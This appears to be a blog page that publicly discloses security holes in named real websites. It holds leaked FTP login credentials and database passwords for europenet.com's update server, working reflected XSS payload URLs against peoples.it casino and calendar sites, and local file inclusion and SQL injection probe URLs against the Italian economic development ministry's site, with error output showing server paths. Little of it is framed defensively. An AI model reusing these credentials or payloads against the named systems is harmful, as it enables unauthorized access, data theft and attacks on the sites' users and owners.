Skip to main content

Posts

Showing posts with the label Blind SQL Injection

europenet.com bravo - ftp access - update suggestions - system compromise

europenet.com bravo update server address: vm203034.planetacomnetwork.com user: bravoupdate pass: eunesr OKey40 and okeyupd folders should be used to update the normal Okey client. To update flawlessly without restarting each time the update_exe.exe if a download fails. You can resume the downloads with any ftp client instead of download the files from the beginning). save the files in "Dati/Temp" and set them as read only (to avoid the deletion). After the update clean the folder except for agg.dat. The password for MagicDb.mdb is "magic" The password for catc.dat is "128159a7c9f2009" (both are Ms Access files) I cannot test the firmware and the -programmer- I don't have one and I don't own any of those products. ------------------------------------------------------------ Other informations cannot be published ... sorry.

Microgame casino people's tv calendario - info disclosure, XSS, flashvars xss

XSS (this one will also work after that the victim clicks on any link of the page) http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/ ----- http://www.tv.peoples.it/wp-content/themes/on-demand/ Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1 ---- free info http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2 http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2 ---- XSS http://calendario.peo...

www.sviluppoeconomico.gov.it | XSS - Blind SQL Injection - LFI - System Compromise

http://www.sviluppoeconomico.gov.it/primopiano/dettaglio_primopiano.php?sezione=primopiano&tema_dir=../index.php&id_primopiano=87 Warning: require(../../index.php\0\0/navigazione/right_menu.php) [function.require]: failed to open stream: No such file or directory in /var/www/sitomap/primopiano/dettaglio_primopiano.php on line 25 sample sql inj. http://www.sviluppoeconomico.gov.it/organigramma/elenco_dossier.php?sezione=organigramma&tema_dir=tema2&gruppo=5%20group%20by%201 - Fatal error: Call to a member function Fields() on a non-object in /var/www/sitomap/class/lista_dossier.php on line 45 -